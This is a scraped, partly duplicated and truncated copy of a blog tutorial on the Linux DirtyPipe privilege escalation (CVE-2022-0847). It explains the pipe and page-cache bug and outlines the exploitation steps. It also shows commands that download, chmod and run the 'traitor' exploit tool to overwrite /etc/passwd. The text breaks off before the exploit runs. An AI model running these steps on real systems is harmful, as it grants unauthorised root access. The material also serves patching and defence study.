Hacking Articles is a very interesting blog about information security, penetration testing and vulnerability assessment managed by Raj Chandel.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles
Linux Privilege Escalation: DirtyPipe (CVE 2022-0847)
IntroductionCVE 2022-0847 is a privilege escalation vulnerability discovered by Max Kellerman present in Linux Kernel itself post versions 5.8 which allows overwriting data in arbitrary read-only files or in simpler words, lets unprivileged processes inject code in privileged/root process and thus, escalating privilege. The original post with intricate work and details can be found here. Table of content* Background
* Root Problem as Explained
* Some common terms and definitions
* Vulnerability Discovery/ Simulation
* Exploitation
* Demonstration: Method 1
* Demonstration: Method 2
* Patch status
* Conclusion BackgroundMax came to know of the vulnerability after he tried to resolve unprecedented CRC error in access logs. Many consumers of cm4all.com were reporting that monthly access logs, even though downloadable, couldn’t be decompressed and were throwing error. Max explains in his post how he has used the Z_SYNC_FLUSH mechanism along with splicing to concatenate daily log files into monthly ZIP archives available to be downloaded over HTTP. Upon closer examination, he reached the root problem. Root Problem as ExplainedLet me take some time to rephrase the problem statement mentioned by Max which lead to the discovery of this vulnerability.
Upon examining the access log zip files provided by consumers. He shared the following hex dump of the generic file:
81 d6 94 39 81 05 b0 ed e9 c0 fd 07 00 00 ff ff 03 00 9c 12 0b f5 f7 4a 00 00
00 00 ff ff: sync flush bytes
03 00: empty “final” block
9c 12 0b f5: CRC of the zip file
f7 4a 00 00: File length in decimals = 19191 bytes.
However, corrupt file showed the following hex dump:
81 d6 94 39 81 05 b0 ed e9 c0 fd 07 00 00 ff ff 03 00 50 4b 01 02 1e 03 14 00
50 4b 01 02: Changed CRC! 50 4b represents ASCII for “PK.” 01 02 represents code for central directory file header
1e 03 14 00: Changed file length in decimals 1.3Mb
As we can see, the CRC has changed to represent letters “PK” which is a header for *.zip files and the central directory file header. 1e 03 is equal to 30 (UNIX v3.0) and 14 00 is the version needed to extract (translated to ASCII 20 or v2.0)
Only 8 bytes were considered and the rest truncated.
Turns out the corruption was occurring because of a pipe error. You see, when you concatenate daily logs for a month it does so like the following:
Day 1+ Day 2 + …. + Day 31
It becomes a ZIP file when all 31 days are concatenated. Hence, on Day 31, filename.zip is created. While concatenating last day’s logs, a pipe error occurs which overwrites the CRC with ZIP header, thus, the “PK” part along with other details. Some common terms and definitions* Page: Smallest unit of memory managed by CPU. Unit size 4 KB. If a process requests memory, the CPU allocates multiple pages to that process managed by “page cache.” Pipes use page reference to achieve memory handoff.
* Pipe: A connection between 2 system processes such that stdout from one process becomes the stdin of the other process. It is a one-way communication method.
echo “abc” | cat > /dev/null
In the above case, echo is the STDOUT and cat takes in “abc” as STDIN. These inputs in the pipe are handled by file descriptors.
interestingly enough, “|” is called a pipe operator too. Quite literal!
* File descriptor (FD): Integer that uniquely identifies an open file of the process. It ranges from 0 to 1023.
0 => reserved for STDIN
1 => reserved for STDOUT
2 => STDERR
3 to 1023 => customizable
Thus, a pipe becomes:
FD[1] [WRITE end] (pipe output) <=
* Splice: splice() moves data between two file descriptors without copying between kernel address space and user address space. It transfers up to len bytes of data from the file descri[...]
___________________________
@hacking_Attack
@Hacking_Video
Linux Privilege Escalation: DirtyPipe (CVE 2022-0847)
IntroductionCVE 2022-0847 is a privilege escalation vulnerability discovered by Max Kellerman present in Linux Kernel itself post versions 5.8 which allows overwriting data in arbitrary read-only files or in simpler words, lets unprivileged processes inject code in privileged/root process and thus, escalating privilege. The original post with intricate work and details can be found here. Table of content* Background
* Root Problem as Explained
* Some common terms and definitions
* Vulnerability Discovery/ Simulation
* Exploitation
* Demonstration: Method 1
* Demonstration: Method 2
* Patch status
* Conclusion BackgroundMax came to know of the vulnerability after he tried to resolve unprecedented CRC error in access logs. Many consumers of cm4all.com were reporting that monthly access logs, even though downloadable, couldn’t be decompressed and were throwing error. Max explains in his post how he has used the Z_SYNC_FLUSH mechanism along with splicing to concatenate daily log files into monthly ZIP archives available to be downloaded over HTTP. Upon closer examination, he reached the root problem. Root Problem as ExplainedLet me take some time to rephrase the problem statement mentioned by Max which lead to the discovery of this vulnerability.
Upon examining the access log zip files provided by consumers. He shared the following hex dump of the generic file:
81 d6 94 39 81 05 b0 ed e9 c0 fd 07 00 00 ff ff 03 00 9c 12 0b f5 f7 4a 00 00
00 00 ff ff: sync flush bytes
03 00: empty “final” block
9c 12 0b f5: CRC of the zip file
f7 4a 00 00: File length in decimals = 19191 bytes.
However, corrupt file showed the following hex dump:
81 d6 94 39 81 05 b0 ed e9 c0 fd 07 00 00 ff ff 03 00 50 4b 01 02 1e 03 14 00
50 4b 01 02: Changed CRC! 50 4b represents ASCII for “PK.” 01 02 represents code for central directory file header
1e 03 14 00: Changed file length in decimals 1.3Mb
As we can see, the CRC has changed to represent letters “PK” which is a header for *.zip files and the central directory file header. 1e 03 is equal to 30 (UNIX v3.0) and 14 00 is the version needed to extract (translated to ASCII 20 or v2.0)
Only 8 bytes were considered and the rest truncated.
Turns out the corruption was occurring because of a pipe error. You see, when you concatenate daily logs for a month it does so like the following:
Day 1+ Day 2 + …. + Day 31
It becomes a ZIP file when all 31 days are concatenated. Hence, on Day 31, filename.zip is created. While concatenating last day’s logs, a pipe error occurs which overwrites the CRC with ZIP header, thus, the “PK” part along with other details. Some common terms and definitions* Page: Smallest unit of memory managed by CPU. Unit size 4 KB. If a process requests memory, the CPU allocates multiple pages to that process managed by “page cache.” Pipes use page reference to achieve memory handoff.
* Pipe: A connection between 2 system processes such that stdout from one process becomes the stdin of the other process. It is a one-way communication method.
echo “abc” | cat > /dev/null
In the above case, echo is the STDOUT and cat takes in “abc” as STDIN. These inputs in the pipe are handled by file descriptors.
interestingly enough, “|” is called a pipe operator too. Quite literal!
* File descriptor (FD): Integer that uniquely identifies an open file of the process. It ranges from 0 to 1023.
0 => reserved for STDIN
1 => reserved for STDOUT
2 => STDERR
3 to 1023 => customizable
Thus, a pipe becomes:
FD[1] [WRITE end] (pipe output) <=
* Splice: splice() moves data between two file descriptors without copying between kernel address space and user address space. It transfers up to len bytes of data from the file descri[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles
Linux Privilege Escalation: DirtyPipe (CVE 2022-0847)
DirtyPipe CVE 2022-0847 lets unprivileged Linux users escalate to root via page cache overwrite and arbitrary file write.
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles Linux Privilege Escalation: DirtyPipe (CVE 2022-0847) IntroductionCVE 2022-0847 is a privilege escalation vulnerability discovered by Max Kellerman present in Linux Kernel itself post versions 5.8 which allows overwriting data in arbitrary…
ptor fd_in to the file descriptor fd_out, where one of the file descriptors must refer to a pipe.
Format: splice(FD0, offset FD0, FD1, offset FD1, length, flags);
Thus, by providing in the FD1 to write to a file and reading from FD0, splice can write into files.
* Write function: write() in C can assist a user to write into any file and when splice is used, write() can provide input to a pipe too.
Format: write(FD1, buffer to write, size of buffer); Vulnerability Discovery/ SimulationMax discovered through the corrupt access logs that due to a pipe error, unintentional data is being written into the zip file. He simulated the same:
Step 1: open a file “foo” and write “AAAAA” in the file. Pseudocode is like so:
int main()
{
for(;;) write(1, "AAAAA", 5);
}
Step 2: create a pipe at offset 0 leading to foo.txt at the WRITE end.
Step 3: Splice and Write to this pipe another string “BBBBB”
Step 4: Page cache gets overwritten
Pseudocode for steps 2 through 4 is as follows:
int main()
{
for(;;)
{
splice(0,0,1,0,2,0);
write(1,"BBBBB",5);
}
Discovery: String “BBBBB” gets written to the file foo even though the second process had no permission to write to the file foo.
What causes this: Function PIPE_BUF_FLAG_CAN_MERGE had a missing flag initialization.
“By injecting PIPE_BUF_FLAG_CAN_MERGE into a page cache reference, it is possible to overwrite data in the page cache, simply by writing new data into the pipe prepared in a special way.” ExploitationIf you’ve understood the discovery and simulation of the vulnerability in pipe, exploitation is quite easy to follow. You see, till now we have learnt how writing to a file by providing input through pipe can cause arbitrary file write. Thus, exploitation is as follows:
* Create a pipe
* Fill the pipe with arbitrary data (to set the PIPE_BUF_FLAG_CAN_MERGE flag in all ring entries)
* Drain the pipe
* Splice the data from the target file (opened in ReadOnly mode) into the pipe from just before the target offset.
* Write arbitrary data into the pipe. This will now overwrite Page Cache as PIPE_BUF_FLAG_CAN_MERGE is set!
It works because page cache is always writeable by Kernel and writing to a pipe never checks for any permissions.
Max gave a sample exploit code in the original writeup which works just fine however we won’t be using that here.
Here, we will demonstrate two methods that will pipe the data into “/etc/passwd” file and grant us sudo rights. You can follow GTFObins to understand the method. Demonstration: Method 1Liam’s tool called “traitor” has recently been updated to include an exploit for the CVE 2022-0847. First, let’s see if our user “ignite” is a normal user.
https://blogger.googleusercontent.com/img/a/AVvXsEjZbYBRGTRoZNwMAWdSfBdIAOADboZ5ahhajiqVz8GXCOQXKpnej7SHu_M5OEQVAfwImXu7RMRlbn6BxmO_jspJbLPqS7YFIEl-4yHcbllaYdjhOsPQyN4Wesm6r-AT4lplCfpwD2P7XJEtebTyEdAuyWv6vvJ3RMrSfkRiC-Js898mo0X5hKWIwzyvPw=s16000
Perfect, a low-priv user. To download the ELF executable, you can:
wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
https://blogger.googleusercontent.com/img/a/AVvXsEiSxvuD2_YRvx_zDgvuuyxKz927-N4Pao8CRPTL7zLcbHDXQPUTeX7PFgL6hy6JJFQXyiyXF9dwC7jZjp6wO3i_3RWM8V16X_CYXeLyjSMnritYndLXQTlCYNBjWlGGMnNgqdskfhp4Stp16hxgW4cx-vU6DuYe3AVT8iiDlabuSGbZM9pi2QU4bsjeHg=s16000
Now, you need to give it execute permissions and run it to detect if the current OS is vulnerable by DirtyPipe or not. As you can see, Kernel 5.13 is vulnerable to the exploit!
chmod 777 traitor-amd64
./traitor-amd64
https://blogger.googleusercontent.com/img/a/AVvXsEjqWXNZKHG7bDzUfN2gr6hzl1Qjht-0YIFb9uzHLqqt-MU7HQfV-9WSZoVn3ZDeV3Q-zmLeEldhEvoMDW2MHZj--_c67Sii6yJjuKbVwZmSatIlP_ZprBA129OrQBBMq4ieKqgR6WD27y7HBf_5E-40yAvH2hFblQQP4flczkAS1R2llJDCTbz4BboYgA=s16000
To run the exploit, we can simply run this co[...]
___________________________
@hacking_Attack
@Hacking_Video
Format: splice(FD0, offset FD0, FD1, offset FD1, length, flags);
Thus, by providing in the FD1 to write to a file and reading from FD0, splice can write into files.
* Write function: write() in C can assist a user to write into any file and when splice is used, write() can provide input to a pipe too.
Format: write(FD1, buffer to write, size of buffer); Vulnerability Discovery/ SimulationMax discovered through the corrupt access logs that due to a pipe error, unintentional data is being written into the zip file. He simulated the same:
Step 1: open a file “foo” and write “AAAAA” in the file. Pseudocode is like so:
int main()
{
for(;;) write(1, "AAAAA", 5);
}
Step 2: create a pipe at offset 0 leading to foo.txt at the WRITE end.
Step 3: Splice and Write to this pipe another string “BBBBB”
Step 4: Page cache gets overwritten
Pseudocode for steps 2 through 4 is as follows:
int main()
{
for(;;)
{
splice(0,0,1,0,2,0);
write(1,"BBBBB",5);
}
Discovery: String “BBBBB” gets written to the file foo even though the second process had no permission to write to the file foo.
What causes this: Function PIPE_BUF_FLAG_CAN_MERGE had a missing flag initialization.
“By injecting PIPE_BUF_FLAG_CAN_MERGE into a page cache reference, it is possible to overwrite data in the page cache, simply by writing new data into the pipe prepared in a special way.” ExploitationIf you’ve understood the discovery and simulation of the vulnerability in pipe, exploitation is quite easy to follow. You see, till now we have learnt how writing to a file by providing input through pipe can cause arbitrary file write. Thus, exploitation is as follows:
* Create a pipe
* Fill the pipe with arbitrary data (to set the PIPE_BUF_FLAG_CAN_MERGE flag in all ring entries)
* Drain the pipe
* Splice the data from the target file (opened in ReadOnly mode) into the pipe from just before the target offset.
* Write arbitrary data into the pipe. This will now overwrite Page Cache as PIPE_BUF_FLAG_CAN_MERGE is set!
It works because page cache is always writeable by Kernel and writing to a pipe never checks for any permissions.
Max gave a sample exploit code in the original writeup which works just fine however we won’t be using that here.
Here, we will demonstrate two methods that will pipe the data into “/etc/passwd” file and grant us sudo rights. You can follow GTFObins to understand the method. Demonstration: Method 1Liam’s tool called “traitor” has recently been updated to include an exploit for the CVE 2022-0847. First, let’s see if our user “ignite” is a normal user.
https://blogger.googleusercontent.com/img/a/AVvXsEjZbYBRGTRoZNwMAWdSfBdIAOADboZ5ahhajiqVz8GXCOQXKpnej7SHu_M5OEQVAfwImXu7RMRlbn6BxmO_jspJbLPqS7YFIEl-4yHcbllaYdjhOsPQyN4Wesm6r-AT4lplCfpwD2P7XJEtebTyEdAuyWv6vvJ3RMrSfkRiC-Js898mo0X5hKWIwzyvPw=s16000
Perfect, a low-priv user. To download the ELF executable, you can:
wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
https://blogger.googleusercontent.com/img/a/AVvXsEiSxvuD2_YRvx_zDgvuuyxKz927-N4Pao8CRPTL7zLcbHDXQPUTeX7PFgL6hy6JJFQXyiyXF9dwC7jZjp6wO3i_3RWM8V16X_CYXeLyjSMnritYndLXQTlCYNBjWlGGMnNgqdskfhp4Stp16hxgW4cx-vU6DuYe3AVT8iiDlabuSGbZM9pi2QU4bsjeHg=s16000
Now, you need to give it execute permissions and run it to detect if the current OS is vulnerable by DirtyPipe or not. As you can see, Kernel 5.13 is vulnerable to the exploit!
chmod 777 traitor-amd64
./traitor-amd64
https://blogger.googleusercontent.com/img/a/AVvXsEjqWXNZKHG7bDzUfN2gr6hzl1Qjht-0YIFb9uzHLqqt-MU7HQfV-9WSZoVn3ZDeV3Q-zmLeEldhEvoMDW2MHZj--_c67Sii6yJjuKbVwZmSatIlP_ZprBA129OrQBBMq4ieKqgR6WD27y7HBf_5E-40yAvH2hFblQQP4flczkAS1R2llJDCTbz4BboYgA=s16000
To run the exploit, we can simply run this co[...]
___________________________
@hacking_Attack
@Hacking_Video